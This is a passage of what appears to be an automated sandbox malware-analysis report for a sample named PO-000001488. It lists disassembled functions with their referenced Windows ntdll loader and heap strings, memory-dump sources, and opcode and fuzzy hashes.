                                                      • Instruction Fuzzy Hash: 6EC28F716083419FE725CF29C880BABBBE5BFC8754F05892EEA8997361D734D805CB52
                                                      Function 014CA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                      • API String ID: 0-2779062949
                                                      • Opcode ID: ef63d5a31b2e46dbc8dd65175afca035d7e1d2d4baefa3d222c2ca2e1cadc8eb
                                                      • Instruction ID: e919587745bd24cdcbc496c14b85dd735d6d1ad78ae4ff1a696fd5edbc5e5204
                                                      • Opcode Fuzzy Hash: ef63d5a31b2e46dbc8dd65175afca035d7e1d2d4baefa3d222c2ca2e1cadc8eb
                                                      • Instruction Fuzzy Hash: B7A17C769012399BDB319F28CC88BAEB7B8FF55710F1005EAD909AB251E7359E84CF50
                                                      Function 014F0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • LdrpCheckModule, xrefs: 0153A117
                                                      • Failed to allocated memory for shimmed module list, xrefs: 0153A10F
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0153A121
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-161242083
                                                      • Opcode ID: 5dc046823d60b9d1c134f6699a7078223a11ab6364b6047821305415178a94c1
                                                      • Instruction ID: 2961bd165e3dd68d0e4549f65fbf4d831726ac235b1166f49e3a2c2cdb378e76
                                                      • Opcode Fuzzy Hash: 5dc046823d60b9d1c134f6699a7078223a11ab6364b6047821305415178a94c1
                                                      • Instruction Fuzzy Hash: CF71F270A006069FDB29DF68C980BBEB7F1FB84704F15402EE552DB366E734AA42CB40
                                                      Function 014E0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                      • API String ID: 0-1334570610
                                                      • Opcode ID: 55d13f3fbc62fbd685f4847a0745fd7565104f72a1b634e88bb01efae78f9896
                                                      • Instruction ID: 041d79cfaa53a4df7637dc9335d238c50ef042752f4910077692b7cc9066a572
                                                      • Opcode Fuzzy Hash: 55d13f3fbc62fbd685f4847a0745fd7565104f72a1b634e88bb01efae78f9896
                                                      • Instruction Fuzzy Hash: F86180707103069FDB29CF68C484B6ABBE5FF54705F14855EE4698F2A2D7B0E841CB91
                                                      Function 0150C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • Failed to reallocate the system dirs string !, xrefs: 015482D7
                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 015482DE
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 015482E8
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-1783798831
                                                      • Opcode ID: f7cd66f3acac1ffb37a11ecc23ba6ff8c66396e962b182ced4a1140f9cd5b1b4
                                                      • Instruction ID: 2f29b47716a01e7e5d54e7a35898c00a156fd891314909b6f201230dba9895ed
                                                      • Opcode Fuzzy Hash: f7cd66f3acac1ffb37a11ecc23ba6ff8c66396e962b182ced4a1140f9cd5b1b4
                                                      • Instruction Fuzzy Hash: 3C4120B1100701AFC722EFA9DC44B5B77E8BF64B14F014A2EB9549B2A0EB70E804CB91
                                                      Function 0158C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0158C1C5
                                                      • PreferredUILanguages, xrefs: 0158C212
                                                      • @, xrefs: 0158C1F1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                      • API String ID: 0-2968386058
                                                      • Opcode ID: 16a76a45c3012252687972d606b1bf0c0ee183658072168546cb97bfff169f52
                                                      • Instruction ID: cbadc0d37c6bb7d4fce63b816ff7ecb8a5c11f441a22e23a3eb8987e7ef2090c
                                                      • Opcode Fuzzy Hash: 16a76a45c3012252687972d606b1bf0c0ee183658072168546cb97bfff169f52
                                                      • Instruction Fuzzy Hash: D3416871D0021AEBEF11EBD9C841FEEB7B8BB54710F14416AE64ABB290D7749A44CB60
                                                      Function 01564144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                      • API String ID: 0-1373925480
                                                      • Opcode ID: c3f3ea5191d845326c2838d03e285e8ae066dbc0f64d2ac1e039c36dcec68d72
                                                      • Instruction ID: c0ba579fe4253a2b968759b66f49ce43809f4fd131f520d0862147318e342948
                                                      • Opcode Fuzzy Hash: c3f3ea5191d845326c2838d03e285e8ae066dbc0f64d2ac1e039c36dcec68d72
                                                      • Instruction Fuzzy Hash: 1841F332A00659CBEB26DBA9C844BADBBFCFFA5340F24045AD901EF791D7358941CB90
                                                      Function 01554755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01554888
                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 01554899
                                                      • LdrpCheckRedirection, xrefs: 0155488F
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                      • API String ID: 0-3154609507
                                                      • Opcode ID: 2994b04923629059ecb822aa4fe84de883af8c2079ea1dbb9fd90ed368531c40
                                                      • Instruction ID: f93e8468ede03a3cbaf7cd730acb9fc8f8866c71617cce1a27d66bf1bb14a067
                                                      • Opcode Fuzzy Hash: 2994b04923629059ecb822aa4fe84de883af8c2079ea1dbb9fd90ed368531c40
                                                      • Instruction Fuzzy Hash: EE41D132A146519FCBA1CE69D860A2A7BE4BF89A50B06056EED589F311F330D880CB91
                                                      Function 014E0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                      • API String ID: 0-2558761708
                                                      • Opcode ID: 858143545e5212e0b067a69f8e12a6c201aed638aa07247ade861114c7d31d0b
                                                      • Instruction ID: 9eed7ee71f58e284f899ba3fbd1cef087b17f26780773fb677874a4380c38bd2
                                                      • Opcode Fuzzy Hash: 858143545e5212e0b067a69f8e12a6c201aed638aa07247ade861114c7d31d0b
                                                      • Instruction Fuzzy Hash: 2F11DF313241029FDB2DCA29C859B7AB3E4FF90A16F19812EF416CF261EB70D841C751
                                                      Function 015520DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • LdrpInitializationFailure, xrefs: 015520FA
                                                      • Process initialization failed with status 0x%08lx, xrefs: 015520F3
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01552104
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-2986994758
                                                      • Opcode ID: 5b580ff5f09bc7a2358646ac7f10959d17ba9d6b5f6097990cb85c09d5c36e6d
                                                      • Instruction ID: 6dfb95d8ab0b287631ab2bfdd7a86752d722723ff656a03b7abfef0e50ea2363
                                                      • Opcode Fuzzy Hash: 5b580ff5f09bc7a2358646ac7f10959d17ba9d6b5f6097990cb85c09d5c36e6d
                                                      • Instruction Fuzzy Hash: 50F0C275640309BFE724EA4DDC57FDA37A8FB90B54F65005AFA006F295D2F0AA04CBA1
                                                      Function 014E03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: #%u
                                                      • API String ID: 48624451-232158463
                                                      • Opcode ID: 8473a29792b442578bb21cb6fa614e8f6283b1c6517bb2f5201172cfdacf6fc7
                                                      • Instruction ID: 20d5ad9df0d98e837892d8d64eb252eba2383bcc7411f9734967f166f2cf35e1
                                                      • Opcode Fuzzy Hash: 8473a29792b442578bb21cb6fa614e8f6283b1c6517bb2f5201172cfdacf6fc7
                                                      • Instruction Fuzzy Hash: E8714B71A0014A9FDB01DFA9C994FAEB7F8FF58704F14406AE905EB261EA34ED01CB60
                                                      Function 014DA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • LdrResSearchResource Enter, xrefs: 014DAA13
                                                      • LdrResSearchResource Exit, xrefs: 014DAA25
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                      • API String ID: 0-4066393604
                                                      • Opcode ID: e771060dc3b152cfe8b7bd0c314131bf458fcd381a687b77acbd74e7d89f614e
                                                      • Instruction ID: ddb2d96d84cfa648ba0b2180f2de57cc05b0d4c8119245b1b29a335a8fe705f6
                                                      • Opcode Fuzzy Hash: e771060dc3b152cfe8b7bd0c314131bf458fcd381a687b77acbd74e7d89f614e
                                                      • Instruction Fuzzy Hash: 55E19171E002099FEF22CF99C990BAEBBB9BF44310F20052AEA11EB361D7749941CB51
                                                      Function 0159A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `$`
                                                      • API String ID: 0-197956300
                                                      • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                      • Instruction ID: f4cb6c099fa335843ae97d465b8b1167f4b27f987b33436c7f677b624c23165e
                                                      • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                      • Instruction Fuzzy Hash: 3EC1AF312043469BEB25CF28C845B6BBBE5BFD4318F184A2DF6968F290D774D505CBA2
                                                      Function 0154E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: Legacy$UEFI
                                                      • API String ID: 2994545307-634100481
                                                      • Opcode ID: 227e58d5dec6eb3e8b3bfe7658df8f23bc65a0d3eabc08d28d1bcdc0c39b924b
                                                      • Instruction ID: 3471ee4d86e91885ae7c84da9a240bde98180db080ea41004271d301d432a0e7
                                                      • Opcode Fuzzy Hash: 227e58d5dec6eb3e8b3bfe7658df8f23bc65a0d3eabc08d28d1bcdc0c39b924b
                                                      • Instruction Fuzzy Hash: DA616C71E002099FEB25DFA9C841BADBBF5FB44714F24446EE649EF251D735A900CB50
                                                      Function 015743D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$MUI
                                                      • API String ID: 0-17815947
                                                      • Opcode ID: c047237e5feac8eba07b383538f7961e2898a973bf61126de58ce3b07ecff6d1
                                                      • Instruction ID: 427a64f618f36db3bfc9c44e5b67fd3272950f0fa54e9416f9b2302dab77faf8
                                                      • Opcode Fuzzy Hash: c047237e5feac8eba07b383538f7961e2898a973bf61126de58ce3b07ecff6d1
                                                      • Instruction Fuzzy Hash: 1E51F871E0021EAEEB11DFA9DC91EEEBBB9FB54754F10052AE611AB290D6309905CB60
                                                      Function 014D04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 014D063D
                                                      • kLsE, xrefs: 014D0540
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                      • API String ID: 0-2547482624
                                                      • Opcode ID: ab669ea1b5e0cfa650decdc08d6c837ad32ec35f8168c19f9d7044331fc8ac0c
                                                      • Instruction ID: 7fac58530e71fb19f0a4732dc30cf09d41be50cacc63282c0404fd9253d1e486
                                                      • Opcode Fuzzy Hash: ab669ea1b5e0cfa650decdc08d6c837ad32ec35f8168c19f9d7044331fc8ac0c
                                                      • Instruction Fuzzy Hash: 3A51CD715007428FDB24EF29C4646A7BBE4AF85300F10883FFAAA87361E770D545CB92
                                                      Function 014DA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 014DA2FB
                                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 014DA309
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                      • API String ID: 0-2876891731
                                                      • Opcode ID: 83284639c6b4240da63c4c81baf339d939f36a1e0041f016d721dc5a1330deef
                                                      • Instruction ID: a961f8ac5209e762ba9e4aa92452c7b529058bb499e43b94d98e0d5c8f613508
                                                      • Opcode Fuzzy Hash: 83284639c6b4240da63c4c81baf339d939f36a1e0041f016d721dc5a1330deef
                                                      • Instruction Fuzzy Hash: C141AD30A04649DBEB16CF59C864B6E7BB5FF95700F2440AAE900DF3A1EBB5D941CB50
                                                      Function 0150A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: Cleanup Group$Threadpool!
                                                      • API String ID: 2994545307-4008356553
                                                      • Opcode ID: 2ea9990bdabf8540ea8d1d4c721bb5c033f34e57eaee5d83bf55d474439da1f5
                                                      • Instruction ID: 8535d0041c2fc9ab0e95cebd6eef38870f1cc117d4531617ae1e54816d43ac55
                                                      • Opcode Fuzzy Hash: 2ea9990bdabf8540ea8d1d4c721bb5c033f34e57eaee5d83bf55d474439da1f5
                                                      • Instruction Fuzzy Hash: DF01D1B2644700AFE312DF64CE45B2677F8F795715F018939A659CF190E334D904CB46
                                                      Function 014DC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: MUI
                                                      • API String ID: 0-1339004836
                                                      • Opcode ID: 8568c325d11fe8473a53b0450ab659a2783d305034991186c80f6fc624e9de59
                                                      • Instruction ID: 23eba231ca750dfc35b0f65191d1eb5822f1568260c4502927dfd15e54f44d5a
                                                      • Opcode Fuzzy Hash: 8568c325d11fe8473a53b0450ab659a2783d305034991186c80f6fc624e9de59
                                                      • Instruction Fuzzy Hash: 7D826F75E002199FDF25CFA9C8A0BEEBBB1BF49310F14816ED959AB3A1D7309941CB50
                                                      Function 01556420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      • Opcode ID: 3e7d511de10a51ade2da01b028a0afcf3bbceacf6707429e216f5bcfdfade636
                                                      • Instruction ID: 18ad708e5cce694a66d16bf8f6c68bb1e8d1f3539e1b7d7b8c95b3d5aa76d3b6
                                                      • Opcode Fuzzy Hash: 3e7d511de10a51ade2da01b028a0afcf3bbceacf6707429e216f5bcfdfade636
                                                      • Instruction Fuzzy Hash: B8916372940259AFEB21DF95CC95FAE7BB8FF14750F50405AF700AF2A0D675A900CBA0
                                                      Function 0157E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      • Opcode ID: bea10998b624e9812b21bbc6fd4ae4fbf696c75ef8c441f1a32720ec9acd424c
                                                      • Instruction ID: 531569b949c7962508a47420dc17d5138cae141484620f91c17cd4bd22d776bd
                                                      • Opcode Fuzzy Hash: bea10998b624e9812b21bbc6fd4ae4fbf696c75ef8c441f1a32720ec9acd424c
                                                      • Instruction Fuzzy Hash: 28918371900606BFDB22AFA5EC46FAFBBB9FF95750F100069F505AB260D774A901CB90
                                                      Function 0150A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: GlobalTags
                                                      • API String ID: 0-1106856819
                                                      • Opcode ID: 35532bcd539c2c3edfbeae61ef40ce74b258497143fa9a222f8e5e3b1441e7f0
                                                      • Instruction ID: da9074c597d8bd657fc275251c89d691de73a55938021ba2b2cdaad8aa56ebe0
                                                      • Opcode Fuzzy Hash: 35532bcd539c2c3edfbeae61ef40ce74b258497143fa9a222f8e5e3b1441e7f0
                                                      • Instruction Fuzzy Hash: 80716CB5E0020A8FEF28CF99D5907ADBBF1BF99718F14852EE505AB241E7318941CB50
                                                      Function 01574978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .mui
                                                      • API String ID: 0-1199573805
                                                      • Opcode ID: ba5189787ed8236ba72bc9f10e39b83f4f63771a3e9e0c835fcd67da0cf290ff
                                                      • Instruction ID: 8d95ab06f2e35f9e154d192f200c7e3bdddd0be42be658279505a90198465038
                                                      • Opcode Fuzzy Hash: ba5189787ed8236ba72bc9f10e39b83f4f63771a3e9e0c835fcd67da0cf290ff
                                                      • Instruction Fuzzy Hash: 76519472D0022A9BDF11EF99E841ABEBBB5BF14610F05416EE915BF250D7749C01CBE4
                                                      Function 014EE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: EXT-
                                                      • API String ID: 0-1948896318
                                                      • Opcode ID: f3e224d3f127b25b788b8cd7a9be8d2701dce1ad72a660e6882fcd5ae3e53420
                                                      • Instruction ID: 221cf81d4bd85d157d9bac5f4ac41ced8ad1d715c702f71bdc192f5c775fc8db
                                                      • Opcode Fuzzy Hash: f3e224d3f127b25b788b8cd7a9be8d2701dce1ad72a660e6882fcd5ae3e53420
                                                      • Instruction Fuzzy Hash: C541E1725483129BD710DF79D848B6BBBE8AF98705F440A2FF684E7260E674D904C793
                                                      Function 0154C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: BinaryHash
                                                      • API String ID: 0-2202222882
                                                      • Opcode ID: cc06fb4228ad3e5fc471e17ce037cc6d0c8232edaa870d4e0e9728770f045068
                                                      • Instruction ID: 1c6e79ff9dd041689425e242b91905ca35adefd48dbfe83ee015e3c2d79445c7
                                                      • Opcode Fuzzy Hash: cc06fb4228ad3e5fc471e17ce037cc6d0c8232edaa870d4e0e9728770f045068
                                                      • Instruction Fuzzy Hash: BB4136B1D0152EABEB21DA50CC84FDEB77CBB95718F0045A5EA08AF150DB709E498FA4
                                                      Function 01566B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #
                                                      • API String ID: 0-1885708031
                                                      • Opcode ID: 4c4d1f384e670a06dba503587aabaf4e4caf298e2ad92114805d3f8f2ed5b5e2
                                                      • Instruction ID: 84094412a900a4b85885ebc5ceab30ae64a4606df9f9ab8bf83eb0e99528c9e9
                                                      • Opcode Fuzzy Hash: 4c4d1f384e670a06dba503587aabaf4e4caf298e2ad92114805d3f8f2ed5b5e2
                                                      • Instruction Fuzzy Hash: 60310331A00B099EFB22CF69C854BAE7BACFF44704F144029E941AF296DB75E805CBD0
                                                      Function 0154CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: BinaryName
                                                      • API String ID: 0-215506332
                                                      • Opcode ID: 1ffeaa980bba5d69090506e8b2ef0be459978426ef9100d321dc94536d7ec79d
                                                      • Instruction ID: f68376c869e562cd8c69693e4e3858fb13bfff750148467851442010610d659c
                                                      • Opcode Fuzzy Hash: 1ffeaa980bba5d69090506e8b2ef0be459978426ef9100d321dc94536d7ec79d
                                                      • Instruction Fuzzy Hash: F831013690251AAFEB16DB59C845E6FBBB4FFC0768F114169A905AB250D7309E00EBE0
                                                      Function 0155892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0155895E
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                      • API String ID: 0-702105204
                                                      • Opcode ID: dcbe7510c7bc4eb0f4eb1d902480d7459d66cd85b37564eb2f94ffe063d68e68
                                                      • Instruction ID: ff22ba0ba3c5572655b2eecd81a9c9d99bf88a28a0fd569546972a9194527f3e
                                                      • Opcode Fuzzy Hash: dcbe7510c7bc4eb0f4eb1d902480d7459d66cd85b37564eb2f94ffe063d68e68
                                                      • Instruction Fuzzy Hash: 5F01F7313106119FE7615E978CA4A6A7BB6FFD5654B04041FFE411E561CB206845C792
                                                      Function 01572000 Relevance: .8, Instructions: 757COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a861bf69bcc76460699740cbdec69c4fb39386fe8e82909026a11a1782a42a1d
